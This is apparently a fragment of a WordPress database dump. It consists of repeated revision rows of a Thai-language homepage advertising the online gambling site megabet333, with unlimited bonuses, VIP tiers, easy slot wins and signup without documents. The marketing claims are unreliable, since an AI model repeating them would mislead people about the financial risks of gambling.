https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:33:34','2025-10-23 08:33:34','',44,'https://megabet333.biz/?p=131',0,'revision','',0),(132,3,'2025-10-23 08:33:35','2025-10-23 08:33:35','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:33:35','2025-10-23 08:33:35','',44,'https://megabet333.biz/?p=132',0,'revision','',0),(133,3,'2025-10-23 08:33:35','2025-10-23 08:33:35','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:33:35','2025-10-23 08:33:35','',44,'https://megabet333.biz/?p=133',0,'revision','',0),(134,3,'2025-10-23 08:34:34','2025-10-23 08:34:34','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:34:34','2025-10-23 08:34:34','',44,'https://megabet333.biz/?p=134',0,'revision','',0),(135,3,'2025-10-23 08:34:34','2025-10-23 08:34:34','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:34:34','2025-10-23 08:34:34','',44,'https://megabet333.biz/?p=135',0,'revision','',0),(136,3,'2025-10-23 08:34:34','2025-10-23 08:34:34','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:34:34','2025-10-23 08:34:34','',44,'https://megabet333.biz/?p=136',0,'revision','',0),(138,3,'2025-10-23 08:38:50','2025-10-23 08:38:50','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ 